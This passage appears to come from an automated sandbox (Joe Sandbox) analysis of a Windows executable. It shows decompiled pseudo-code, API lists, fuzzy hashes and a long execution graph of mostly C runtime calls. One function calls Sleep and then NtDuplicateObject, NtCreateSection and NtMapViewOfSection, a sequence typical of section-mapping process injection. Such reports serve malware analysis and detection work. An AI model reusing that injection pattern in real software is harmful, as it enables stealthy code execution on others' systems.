                                                				void* _t25;
                                                				intOrPtr* _t27;
                                                
                                                				_t22 = __esi;
                                                				_t8 = _t7;
                                                				_t9 = L00401274(_t8, __edx, __esi, __eflags);
                                                				_t15 =  *((intOrPtr*)(_t24 + 8));
                                                				Sleep(0x1388);
                                                				_push(_t15);
                                                				asm("sbb al, 0x8d");
                                                				_t25 = _t24 + 1;
                                                				asm("cld");
                                                				_push(_t9);
                                                				_push( *((intOrPtr*)(_t25 + 0x10)));
                                                				_push( *((intOrPtr*)(_t25 + 0xc)));
                                                				_push(_t15); // executed
                                                				_t10 = L004014DB(_t15, __edi, _t22); // executed
                                                				_t32 = _t10;
                                                				if(_t10 != 0) {
                                                					E004015D5(_t32, _t15, _t10,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                				}
                                                				 *_t15(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t12 =  *_t27;
                                                				_push(0x7a);
                                                				return L00401274(_t12, 0x3a, _t22, _t32);
                                                			}












                                                0x004019fd
                                                0x004019fd
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                                                • Instruction ID: 733ad67ec3470f7c6e230ccf9a96fa2733df2227e0d514dfe6a1d91c756ccb5a
                                                • Opcode Fuzzy Hash: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                                                • Instruction Fuzzy Hash: A1F03C3570A204EBDF00AA959C41EAA3624AB45354F208577B603B91F1D67D9A12AF2B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447353688.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_409000_thgcici.jbxd
                                                Similarity
                                                • API ID: __close__fileno__flush__freebuf
                                                • String ID:
                                                • API String ID: 3871283149-0
                                                • Opcode ID: 677eaa535cfbfb641590dc26f4b113f3c0aa7ae26b93acb0f6d01b1c0ccda262
                                                • Instruction ID: fce6bbd1adf8aba4c15e15c63faf83b0a4d113cf38cf7de673c2230f9b0d9796
                                                • Opcode Fuzzy Hash: 677eaa535cfbfb641590dc26f4b113f3c0aa7ae26b93acb0f6d01b1c0ccda262
                                                • Instruction Fuzzy Hash: FBF04E71A007005AC630AA7B9C41C1BB3CCAD8537C7150B3FF5A8B31D1D67C89054AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.6%
                                                Total number of Nodes:1435
                                                Total number of Limit Nodes:22
                                                execution_graph 17518 c13300 17519 c1331c 17518->17519 17520 c13371 17518->17520 17519->17520 17522 c16462 17519->17522 17524 c16483 17522->17524 17527 c16487 17522->17527 17534 c17193 17524->17534 17525 c164ef 17525->17519 17527->17524 17528 c1653d 17527->17528 17529 c164cb 17527->17529 17528->17524 17541 c1f06c 17528->17541 17529->17524 17531 c1594d 17529->17531 17551 c1e219 17531->17551 17535 c1719b 17534->17535 17536 c1719c IsProcessorFeaturePresent 17534->17536 17535->17525 17538 c1781d 17536->17538 17858 c177e0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17538->17858 17540 c17900 17540->17525 17542 c1f097 17541->17542 17543 c1f07a 17541->17543 17542->17524 17543->17542 17544 c1f087 17543->17544 17545 c1f09b 17543->17545 17547 c1da28 __dosmaperr 14 API calls 17544->17547 17859 c1ee4d 17545->17859 17549 c1f08c 17547->17549 17550 c1d94e __strnicoll 25 API calls 17549->17550 17550->17542 17552 c1e225 ___scrt_is_nonwritable_in_current_image 17551->17552 17553 c1e243 17552->17553 17554 c1e22c 17552->17554 17564 c1deae EnterCriticalSection 17553->17564 17587 c1da28 17554->17587 17558 c1e252 17565 c1e0f0 17558->17565 17561 c1595b 17561->17524 17564->17558 17566 c1e121 17565->17566 17585 c1e111 _Fputc 17565->17585 17596 c2441e 17566->17596 17568 c1e129 17569 c2441e _Fputc 25 API calls 17568->17569 17573 c1e151 17568->17573 17571 c1e13a 17569->17571 17570 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17572 c1e217 17570->17572 17571->17573 17575 c2441e _Fputc 25 API calls 17571->17575 17593 c1e28f 17572->17593 17574 c2441e _Fputc 25 API calls 17573->17574 17573->17585 17576 c1e17f 17574->17576 17577 c1e146 17575->17577 17578 c1e1a2 17576->17578 17580 c2441e _Fputc 25 API calls 17576->17580 17579 c2441e _Fputc 25 API calls 17577->17579 17578->17585 17603 c23308 17578->17603 17579->17573 17581 c1e18b 17580->17581 17581->17578 17583 c2441e _Fputc 25 API calls 17581->17583 17584 c1e197 17583->17584 17586 c2441e _Fputc 25 API calls 17584->17586 17585->17570 17586->17578 17822 c237ba GetLastError 17587->17822 17589 c1da2d 17590 c1d94e 17589->17590 17845 c1d8ea 17590->17845 17592 c1d95a 17592->17561 17857 c1dec2 LeaveCriticalSection 17593->17857 17595 c1e295 17595->17561 17597 c2442a 17596->17597 17598 c2443f 17596->17598 17599 c1da28 __dosmaperr 14 API calls 17597->17599 17598->17568 17600 c2442f 17599->17600 17601 c1d94e __strnicoll 25 API calls 17600->17601 17602 c2443a 17601->17602 17602->17568 17606 c231ad 17603->17606 17607 c231bd 17606->17607 17608 c231e7 17607->17608 17609 c231fb 17607->17609 17621 c231c2 17607->17621 17610 c1da28 __dosmaperr 14 API calls 17608->17610 17631 c1bdee 17609->17631 17612 c231ec 17610->17612 17616 c1d94e __strnicoll 25 API calls 17612->17616 17614 c23242 17618 c2324a 17614->17618 17643 c29b81 17614->17643 17615 c23216 17639 c2e0ff 17615->17639 17616->17621 17627 c23258 codecvt 17618->17627 17630 c2328f codecvt 17618->17630 17621->17585 17622 c232bf 17624 c232d3 GetLastError 17622->17624 17622->17627 17623 c1da28 __dosmaperr 14 API calls 17623->17621 17624->17627 17624->17630 17625 c1da28 __dosmaperr 14 API calls 17625->17621 17626 c1da28 __dosmaperr 14 API calls 17628 c232f9 17626->17628 17627->17621 17627->17623 17629 c1d94e __strnicoll 25 API calls 17628->17629 17629->17621 17630->17621 17630->17626 17632 c1be05 17631->17632 17633 c1be0e 17631->17633 17632->17614 17632->17615 17633->17632 17646 c23663 GetLastError 17633->17646 17640 c2e11a 17639->17640 17641 c2322b 17639->17641 17640->17641 17819 c2e1aa 17640->17819 17641->17621 17641->17625 17644 c29b98 WideCharToMultiByte 17643->17644 17644->17622 17647 c23680 17646->17647 17648 c2367a 17646->17648 17670 c23686 SetLastError 17647->17670 17686 c25721 17647->17686 17681 c256e2 17648->17681 17655 c1be2e 17673 c238b5 17655->17673 17656 c2371a 17709 c200c9 17656->17709 17657 c236b6 17661 c25721 __dosmaperr 6 API calls 17657->17661 17658 c236cd 17660 c25721 __dosmaperr 6 API calls 17658->17660 17663 c236d9 17660->17663 17664 c236c4 17661->17664 17665 c236ee 17663->17665 17666 c236dd 17663->17666 17698 c22f9f 17664->17698 17704 c23491 17665->17704 17668 c25721 __dosmaperr 6 API calls 17666->17668 17668->17664 17670->17655 17670->17656 17672 c22f9f _free 14 API calls 17672->17670 17674 c238c8 17673->17674 17675 c1be44 17673->17675 17674->17675 17782 c2c630 17674->17782 17677 c238e2 17675->17677 17678 c238f5 17677->17678 17679 c2390a 17677->17679 17678->17679 17803 c2ad22 17678->17803 17679->17632 17720 c254d1 17681->17720 17683 c256fe 17684 c25719 TlsGetValue 17683->17684 17685 c25707 17683->17685 17685->17647 17687 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 17686->17687 17688 c2573d 17687->17688 17689 c2369e 17688->17689 17690 c2575b TlsSetValue 17688->17690 17689->17670 17691 c22f42 17689->17691 17692 c22f4f __dosmaperr 17691->17692 17693 c22f8f 17692->17693 17694 c22f7a RtlAllocateHeap 17692->17694 17726 c2058c 17692->17726 17695 c1da28 __dosmaperr 13 API calls 17693->17695 17694->17692 17696 c22f8d 17694->17696 17695->17696 17696->17657 17696->17658 17699 c22faa HeapFree 17698->17699 17703 c22fd3 __dosmaperr 17698->17703 17700 c22fbf 17699->17700 17699->17703 17701 c1da28 __dosmaperr 12 API calls 17700->17701 17702 c22fc5 GetLastError 17701->17702 17702->17703 17703->17670 17729 c23325 17704->17729 17743 c298cd 17709->17743 17712 c200d9 17714 c200e3 IsProcessorFeaturePresent 17712->17714 17719 c20102 17712->17719 17715 c200ef 17714->17715 17773 c1d7a2 17715->17773 17779 c210e1 17719->17779 17721 c254ff 17720->17721 17725 c254fb std::_Locinfo::_Locinfo_dtor 17720->17725 17722 c2540a std::_Locinfo::_Locinfo_dtor LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 17721->17722 17721->17725 17723 c25513 17722->17723 17724 c25519 GetProcAddress 17723->17724 17723->17725 17724->17725 17725->17683 17727 c205b9 std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 17726->17727 17728 c20597 17727->17728 17728->17692 17730 c23331 ___scrt_is_nonwritable_in_current_image 17729->17730 17731 c1da7c std::_Lockit::_Lockit EnterCriticalSection 17730->17731 17732 c2333b 17731->17732 17733 c2336b __dosmaperr LeaveCriticalSection 17732->17733 17734 c23359 17733->17734 17735 c23437 17734->17735 17736 c23443 ___scrt_is_nonwritable_in_current_image 17735->17736 17737 c1da7c std::_Lockit::_Lockit EnterCriticalSection 17736->17737 17738 c2344d 17737->17738 17739 c23618 __dosmaperr 14 API calls 17738->17739 17740 c23465 17739->17740 17741 c23485 __dosmaperr LeaveCriticalSection 17740->17741 17742 c23473 17741->17742 17742->17672 17744 c297ff __FrameHandler3::FrameUnwindToState EnterCriticalSection LeaveCriticalSection 17743->17744 17745 c200ce 17744->17745 17745->17712 17746 c29912 17745->17746 17747 c2991e ___scrt_is_nonwritable_in_current_image 17746->17747 17748 c2994b __FrameHandler3::FrameUnwindToState 17747->17748 17749 c237ba __dosmaperr 14 API calls 17747->17749 17753 c29945 __FrameHandler3::FrameUnwindToState 17747->17753 17756 c1da7c std::_Lockit::_Lockit EnterCriticalSection 17748->17756 17757 c299be 17748->17757 17749->17753 17750 c29992 17751 c1da28 __dosmaperr 14 API calls 17750->17751 17752 c29997 17751->17752 17754 c1d94e __strnicoll 25 API calls 17752->17754 17753->17748 17753->17750 17755 c2997c 17753->17755 17754->17755 17755->17712 17756->17757 17759 c29a00 17757->17759 17760 c29af1 17757->17760 17770 c29a2f 17757->17770 17758 c29a9e __FrameHandler3::FrameUnwindToState LeaveCriticalSection 17762 c29a75 17758->17762 17766 c23663 __Getctype 37 API calls 17759->17766 17759->17770 17761 c29afc 17760->17761 17763 c1dac4 std::_Lockit::~_Lockit LeaveCriticalSection 17760->17763 17764 c210e1 __FrameHandler3::FrameUnwindToState 23 API calls 17761->17764 17762->17755 17768 c23663 __Getctype 37 API calls 17762->17768 17771 c29a84 17762->17771 17763->17761 17765 c29b04 17764->17765 17767 c29a24 17766->17767 17769 c23663 __Getctype 37 API calls 17767->17769 17768->17771 17769->17770 17770->17758 17771->17755 17772 c23663 __Getctype 37 API calls 17771->17772 17772->17755 17774 c1d7be __FrameHandler3::FrameUnwindToState codecvt 17773->17774 17775 c1d7ea IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17774->17775 17778 c1d8bb __FrameHandler3::FrameUnwindToState 17775->17778 17776 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17777 c1d8d9 17776->17777 17777->17719 17778->17776 17780 c20f75 __FrameHandler3::FrameUnwindToState 23 API calls 17779->17780 17781 c2010c 17780->17781 17783 c2c63c ___scrt_is_nonwritable_in_current_image 17782->17783 17784 c23663 __Getctype 37 API calls 17783->17784 17785 c2c645 17784->17785 17792 c2c68b 17785->17792 17795 c1da7c EnterCriticalSection 17785->17795 17787 c2c663 17796 c2c6b1 17787->17796 17792->17675 17793 c200c9 __FrameHandler3::FrameUnwindToState 37 API calls 17794 c2c6b0 17793->17794 17795->17787 17797 c2c6bf __Getctype 17796->17797 17799 c2c674 17796->17799 17798 c2c3e4 __Getctype 14 API calls 17797->17798 17797->17799 17798->17799 17800 c2c690 17799->17800 17801 c1dac4 std::_Lockit::~_Lockit LeaveCriticalSection 17800->17801 17802 c2c687 17801->17802 17802->17792 17802->17793 17804 c23663 __Getctype 37 API calls 17803->17804 17805 c2ad2c 17804->17805 17808 c2ac3a 17805->17808 17809 c2ac46 ___scrt_is_nonwritable_in_current_image 17808->17809 17810 c2ac60 17809->17810 17811 c1da7c std::_Lockit::_Lockit EnterCriticalSection 17809->17811 17812 c2ac67 17810->17812 17814 c200c9 __FrameHandler3::FrameUnwindToState 37 API calls 17810->17814 17816 c2ac70 17811->17816 17812->17679 17813 c2acb9 __cftoe LeaveCriticalSection 17813->17810 17815 c2acd9 17814->17815 17817 c22f9f _free 14 API calls 17816->17817 17818 c2ac9c 17816->17818 17817->17818 17818->17813 17820 c1da28 __dosmaperr 14 API calls 17819->17820 17821 c2e1be 17820->17821 17821->17641 17823 c237d1 17822->17823 17824 c237d7 17822->17824 17826 c256e2 __dosmaperr 6 API calls 17823->17826 17825 c25721 __dosmaperr 6 API calls 17824->17825 17844 c237dd SetLastError 17824->17844 17827 c237f5 17825->17827 17826->17824 17828 c22f42 __dosmaperr 12 API calls 17827->17828 17827->17844 17829 c23805 17828->17829 17831 c23824 17829->17831 17832 c2380d 17829->17832 17834 c25721 __dosmaperr 6 API calls 17831->17834 17833 c25721 __dosmaperr 6 API calls 17832->17833 17835 c2381b 17833->17835 17836 c23830 17834->17836 17840 c22f9f _free 12 API calls 17835->17840 17837 c23834 17836->17837 17838 c23845 17836->17838 17841 c25721 __dosmaperr 6 API calls 17837->17841 17839 c23491 __dosmaperr 12 API calls 17838->17839 17842 c23850 17839->17842 17840->17844 17841->17835 17843 c22f9f _free 12 API calls 17842->17843 17843->17844 17844->17589 17846 c237ba __dosmaperr 14 API calls 17845->17846 17847 c1d8f5 17846->17847 17850 c1d903 17847->17850 17853 c1d97b IsProcessorFeaturePresent 17847->17853 17849 c1d94d 17851 c1d8ea __strnicoll 25 API calls 17849->17851 17850->17592 17852 c1d95a 17851->17852 17852->17592 17854 c1d987 17853->17854 17855 c1d7a2 __FrameHandler3::FrameUnwindToState 8 API calls 17854->17855 17856 c1d99c GetCurrentProcess TerminateProcess 17855->17856 17856->17849 17857->17595 17858->17540 17860 c1ee59 ___scrt_is_nonwritable_in_current_image 17859->17860 17867 c1deae EnterCriticalSection 17860->17867 17862 c1ee67 17868 c1eea8 17862->17868 17867->17862 17878 c244be 17868->17878 17875 c1ee9c 18087 c1dec2 LeaveCriticalSection 17875->18087 17877 c1ee85 17877->17524 17900 c24483 17878->17900 17880 c244cf 17881 c1eebc 17880->17881 17906 c22fd9 17880->17906 17885 c1eeeb 17881->17885 17884 c22f9f _free 14 API calls 17884->17881 17887 c1eefd 17885->17887 17891 c1eed7 17885->17891 17886 c1ef0b 17888 c1da28 __dosmaperr 14 API calls 17886->17888 17887->17886 17887->17891 17894 c1ef33 _Yarn _Fputc 17887->17894 17889 c1ef10 17888->17889 17890 c1d94e __strnicoll 25 API calls 17889->17890 17890->17891 17896 c2456a 17891->17896 17893 c2441e _Fputc 25 API calls 17893->17894 17894->17891 17894->17893 17922 c1e886 17894->17922 17928 c2732b 17894->17928 17897 c1ee74 17896->17897 17898 c24575 17896->17898 17897->17875 17898->17897 17899 c1e886 ___scrt_uninitialize_crt 62 API calls 17898->17899 17899->17897 17901 c2448f 17900->17901 17902 c2441e _Fputc 25 API calls 17901->17902 17905 c244b0 17901->17905 17903 c244aa 17902->17903 17913 c2f831 17903->17913 17905->17880 17907 c23017 17906->17907 17912 c22fe7 __dosmaperr 17906->17912 17908 c1da28 __dosmaperr 14 API calls 17907->17908 17910 c23015 17908->17910 17909 c23002 RtlAllocateHeap 17909->17910 17909->17912 17910->17884 17911 c2058c std::ios_base::_Init 2 API calls 17911->17912 17912->17907 17912->17909 17912->17911 17914 c2f84b 17913->17914 17915 c2f83e 17913->17915 17917 c2f857 17914->17917 17918 c1da28 __dosmaperr 14 API calls 17914->17918 17916 c1da28 __dosmaperr 14 API calls 17915->17916 17919 c2f843 17916->17919 17917->17905 17920 c2f878 17918->17920 17919->17905 17921 c1d94e __strnicoll 25 API calls 17920->17921 17921->17919 17923 c1e89e 17922->17923 17927 c1e8c3 17922->17927 17924 c2441e _Fputc 25 API calls 17923->17924 17923->17927 17925 c1e8bc 17924->17925 17926 c2732b ___scrt_uninitialize_crt 62 API calls 17925->17926 17926->17927 17927->17894 17929 c27337 ___scrt_is_nonwritable_in_current_image 17928->17929 17930 c27357 17929->17930 17931 c2733f 17929->17931 17932 c273f2 17930->17932 17938 c27389 17930->17938 17998 c1da15 17931->17998 17934 c1da15 __dosmaperr 14 API calls 17932->17934 17937 c273f7 17934->17937 17936 c1da28 __dosmaperr 14 API calls 17939 c2734c 17936->17939 17940 c1da28 __dosmaperr 14 API calls 17937->17940 17953 c2b539 EnterCriticalSection 17938->17953 17939->17894 17942 c273ff 17940->17942 17944 c1d94e __strnicoll 25 API calls 17942->17944 17943 c2738f 17945 c273c0 17943->17945 17946 c273ab 17943->17946 17944->17939 17954 c2741d 17945->17954 17947 c1da28 __dosmaperr 14 API calls 17946->17947 17949 c273b0 17947->17949 17951 c1da15 __dosmaperr 14 API calls 17949->17951 17950 c273bb 18001 c273ea 17950->18001 17951->17950 17953->17943 17955 c2743f 17954->17955 17993 c2745b 17954->17993 17956 c27443 17955->17956 17959 c27493 17955->17959 17957 c1da15 __dosmaperr 14 API calls 17956->17957 17958 c27448 17957->17958 17961 c1da28 __dosmaperr 14 API calls 17958->17961 17960 c274a9 17959->17960 18018 c27d81 17959->18018 18004 c26fc4 17960->18004 17964 c27450 17961->17964 17966 c1d94e __strnicoll 25 API calls 17964->17966 17966->17993 17967 c274f0 17969 c27504 17967->17969 17970 c2754a WriteFile 17967->17970 17968 c274b7 17971 c274bb 17968->17971 17972 c274dd 17968->17972 17973 c2753a 17969->17973 17974 c2750c 17969->17974 17975 c2756d GetLastError 17970->17975 17988 c27528 17970->17988 17981 c275b7 17971->17981 18021 c26f5c 17971->18021 18026 c26bb0 GetConsoleOutputCP 17972->18026 18011 c27035 17973->18011 17977 c27511 17974->17977 17978 c2752a 17974->17978 17975->17988 17977->17981 17983 c2751a 17977->17983 18046 c271f9 17978->18046 17985 c1da28 __dosmaperr 14 API calls 17981->17985 17981->17993 17982 c274d3 17982->17981 17986 c2758d 17982->17986 17982->17993 18039 c27110 17983->18039 17989 c275d8 17985->17989 17991 c27594 17986->17991 17992 c275ab 17986->17992 17988->17982 17990 c1da15 __dosmaperr 14 API calls 17989->17990 17990->17993 17994 c1da28 __dosmaperr 14 API calls 17991->17994 18054 c1d9f2 17992->18054 17993->17950 17996 c27599 17994->17996 17997 c1da15 __dosmaperr 14 API calls 17996->17997 17997->17993 17999 c237ba __dosmaperr 14 API calls 17998->17999 18000 c1da1a 17999->18000 18000->17936 18086 c2b55c LeaveCriticalSection 18001->18086 18003 c273f0 18003->17939 18005 c2f831 ___scrt_uninitialize_crt 25 API calls 18004->18005 18006 c26fd5 18005->18006 18007 c23663 __Getctype 37 API calls 18006->18007 18010 c2702b 18006->18010 18009 c26ff8 18007->18009 18008 c27012 GetConsoleMode 18008->18010 18009->18008 18009->18010 18010->17967 18010->17968 18012 c27044 ___scrt_uninitialize_crt 18011->18012 18015 c270b4 WriteFile 18012->18015 18017 c270f5 18012->18017 18013 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18014 c2710e 18013->18014 18014->17982 18015->18012 18016 c270f7 GetLastError 18015->18016 18016->18017 18017->18013 18059 c27cea 18018->18059 18023 c26f7e 18021->18023 18025 c26fb3 18021->18025 18022 c26fb5 GetLastError 18022->18025 18023->18022 18024 c3045d 5 API calls ___scrt_uninitialize_crt 18023->18024 18023->18025 18024->18023 18025->17982 18027 c1bdee __cftoe 37 API calls 18026->18027 18031 c26c0c _Yarn 18027->18031 18028 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18030 c26f5a 18028->18030 18030->17982 18032 c26eb2 18031->18032 18033 c29b81 __cftof WideCharToMultiByte 18031->18033 18034 c23193 38 API calls __fassign 18031->18034 18035 c26e35 WriteFile 18031->18035 18037 c2e004 19 API calls __cftoe 18031->18037 18038 c26e6d WriteFile 18031->18038 18081 c1f3e9 18031->18081 18032->18028 18033->18031 18034->18031 18035->18031 18036 c26f2a GetLastError 18035->18036 18036->18032 18037->18031 18038->18031 18038->18036 18043 c2711f ___scrt_uninitialize_crt 18039->18043 18040 c271de 18042 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18040->18042 18041 c27194 WriteFile 18041->18043 18044 c271e0 GetLastError 18041->18044 18045 c271f7 18042->18045 18043->18040 18043->18041 18044->18040 18045->17988 18053 c27208 ___scrt_uninitialize_crt 18046->18053 18047 c27310 18048 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18047->18048 18049 c27329 18048->18049 18049->17988 18050 c29b81 __cftof WideCharToMultiByte 18050->18053 18051 c27312 GetLastError 18051->18047 18052 c272c7 WriteFile 18052->18051 18052->18053 18053->18047 18053->18050 18053->18051 18053->18052 18055 c1da15 __dosmaperr 14 API calls 18054->18055 18056 c1d9fd __dosmaperr 18055->18056 18057 c1da28 __dosmaperr 14 API calls 18056->18057 18058 c1da10 18057->18058 18058->17993 18068 c2b610 18059->18068 18061 c27cfc 18062 c27d04 18061->18062 18063 c27d15 SetFilePointerEx 18061->18063 18064 c1da28 __dosmaperr 14 API calls 18062->18064 18065 c27d09 18063->18065 18066 c27d2d GetLastError 18063->18066 18064->18065 18065->17960 18067 c1d9f2 __dosmaperr 14 API calls 18066->18067 18067->18065 18069 c2b632 18068->18069 18070 c2b61d 18068->18070 18073 c1da15 __dosmaperr 14 API calls 18069->18073 18075 c2b657 18069->18075 18071 c1da15 __dosmaperr 14 API calls 18070->18071 18072 c2b622 18071->18072 18074 c1da28 __dosmaperr 14 API calls 18072->18074 18076 c2b662 18073->18076 18078 c2b62a 18074->18078 18075->18061 18077 c1da28 __dosmaperr 14 API calls 18076->18077 18079 c2b66a 18077->18079 18078->18061 18080 c1d94e __strnicoll 25 API calls 18079->18080 18080->18078 18082 c23663 __Getctype 37 API calls 18081->18082 18083 c1f3f4 18082->18083 18084 c238b5 __Getctype 37 API calls 18083->18084 18085 c1f404 18084->18085 18085->18031 18086->18003 18087->17877 18088 c172b5 18093 c17c6e SetUnhandledExceptionFilter 18088->18093 18090 c172ba 18094 c228c4 18090->18094 18092 c172c5 18093->18090 18095 c228ea 18094->18095 18096 c228d0 18094->18096 18095->18092 18096->18095 18097 c1da28 __dosmaperr 14 API calls 18096->18097 18098 c228da 18097->18098 18099 c1d94e __strnicoll 25 API calls 18098->18099 18100 c228e5 18099->18100 18100->18092 18101 c172c7 18102 c172d3 ___scrt_is_nonwritable_in_current_image 18101->18102 18127 c174c9 18102->18127 18104 c172da 18105 c17433 18104->18105 18115 c17304 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 18104->18115 18177 c17b0c IsProcessorFeaturePresent 18105->18177 18107 c1743a 18181 c2111d 18107->18181 18110 c210e1 __FrameHandler3::FrameUnwindToState 23 API calls 18111 c17448 18110->18111 18112 c17323 18113 c173a4 18138 c20daf 18113->18138 18115->18112 18115->18113 18159 c210f7 18115->18159 18117 c173aa 18142 c120e0 18117->18142 18122 c173cf 18123 c173d8 18122->18123 18168 c210d2 18122->18168 18171 c1763a 18123->18171 18128 c174d2 18127->18128 18184 c17d75 IsProcessorFeaturePresent 18128->18184 18132 c174e3 18137 c174e7 18132->18137 18194 c22d4c 18132->18194 18135 c174fe 18135->18104 18137->18104 18139 c20dbd 18138->18139 18140 c20db8 18138->18140 18139->18117 18320 c20b13 18140->18320 18143 c12103 18142->18143 18144 c12244 18143->18144 18568 c122a0 18143->18568 18166 c17c2c GetModuleHandleW 18144->18166 18153 c121c5 GetForegroundWindow 18639 c1d685 18153->18639 18155 c121b3 18155->18153 18156 c121f9 18155->18156 18156->18144 18157 c12210 GetForegroundWindow 18156->18157 18158 c1d685 40 API calls 18157->18158 18158->18156 18160 c22ded ___scrt_is_nonwritable_in_current_image 18159->18160 18161 c2110d std::_Locinfo::_Locinfo_dtor 18159->18161 18162 c23663 __Getctype 37 API calls 18160->18162 18161->18113 18165 c22dfe 18162->18165 18163 c200c9 __FrameHandler3::FrameUnwindToState 37 API calls 18164 c22e28 18163->18164 18165->18163 18167 c173cb 18166->18167 18167->18107 18167->18122 19092 c20f75 18168->19092 18172 c17646 18171->18172 18173 c173e1 18172->18173 19162 c22d5e 18172->19162 18173->18112 18175 c17654 18176 c1a54d ___scrt_uninitialize_crt 7 API calls 18175->18176 18176->18173 18178 c17b22 __FrameHandler3::FrameUnwindToState codecvt 18177->18178 18179 c17bcd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18178->18179 18180 c17c18 __FrameHandler3::FrameUnwindToState 18179->18180 18180->18107 18182 c20f75 __FrameHandler3::FrameUnwindToState 23 API calls 18181->18182 18183 c17440 18182->18183 18183->18110 18185 c174de 18184->18185 18186 c1a52e 18185->18186 18203 c1b607 18186->18203 18190 c1a53f 18191 c1a54a 18190->18191 18217 c1b643 18190->18217 18191->18132 18193 c1a537 18193->18132 18257 c2d9db 18194->18257 18197 c1a54d 18198 c1a560 18197->18198 18199 c1a556 18197->18199 18198->18137 18200 c1a6c6 ___vcrt_uninitialize_ptd 6 API calls 18199->18200 18201 c1a55b 18200->18201 18202 c1b643 ___vcrt_uninitialize_locks DeleteCriticalSection 18201->18202 18202->18198 18204 c1b610 18203->18204 18206 c1b639 18204->18206 18208 c1a533 18204->18208 18221 c1b84c 18204->18221 18207 c1b643 ___vcrt_uninitialize_locks DeleteCriticalSection 18206->18207 18207->18208 18208->18193 18209 c1a693 18208->18209 18238 c1b75d 18209->18238 18212 c1a6a8 18212->18190 18215 c1a6c3 18215->18190 18218 c1b66d 18217->18218 18219 c1b64e 18217->18219 18218->18193 18220 c1b658 DeleteCriticalSection 18219->18220 18220->18218 18220->18220 18226 c1b672 18221->18226 18224 c1b884 InitializeCriticalSectionAndSpinCount 18225 c1b86f 18224->18225 18225->18204 18227 c1b693 18226->18227 18228 c1b68f 18226->18228 18227->18228 18229 c1b6fb GetProcAddress 18227->18229 18231 c1b6ec 18227->18231 18233 c1b712 LoadLibraryExW 18227->18233 18228->18224 18228->18225 18229->18228 18231->18229 18232 c1b6f4 FreeLibrary 18231->18232 18232->18229 18234 c1b729 GetLastError 18233->18234 18235 c1b759 18233->18235 18234->18235 18236 c1b734 ___vcrt_InitializeCriticalSectionEx 18234->18236 18235->18227 18236->18235 18237 c1b74a LoadLibraryExW 18236->18237 18237->18227 18239 c1b672 ___vcrt_InitializeCriticalSectionEx 5 API calls 18238->18239 18240 c1b777 18239->18240 18241 c1b790 TlsAlloc 18240->18241 18242 c1a69d 18240->18242 18242->18212 18243 c1b80e 18242->18243 18244 c1b672 ___vcrt_InitializeCriticalSectionEx 5 API calls 18243->18244 18245 c1b828 18244->18245 18246 c1b843 TlsSetValue 18245->18246 18247 c1a6b6 18245->18247 18246->18247 18247->18215 18248 c1a6c6 18247->18248 18249 c1a6d0 18248->18249 18250 c1a6d6 18248->18250 18252 c1b798 18249->18252 18250->18212 18253 c1b672 ___vcrt_InitializeCriticalSectionEx 5 API calls 18252->18253 18254 c1b7b2 18253->18254 18255 c1b7ca TlsFree 18254->18255 18256 c1b7be 18254->18256 18255->18256 18256->18250 18258 c2d9eb 18257->18258 18259 c174f0 18257->18259 18258->18259 18262 c2465a 18258->18262 18267 c2470e 18258->18267 18259->18135 18259->18197 18263 c24661 18262->18263 18264 c246a4 GetStdHandle 18263->18264 18265 c2470a 18263->18265 18266 c246b7 GetFileType 18263->18266 18264->18263 18265->18258 18266->18263 18268 c2471a ___scrt_is_nonwritable_in_current_image 18267->18268 18279 c1da7c EnterCriticalSection 18268->18279 18270 c24721 18280 c2b49b 18270->18280 18277 c2465a 2 API calls 18278 c2473f 18277->18278 18299 c24765 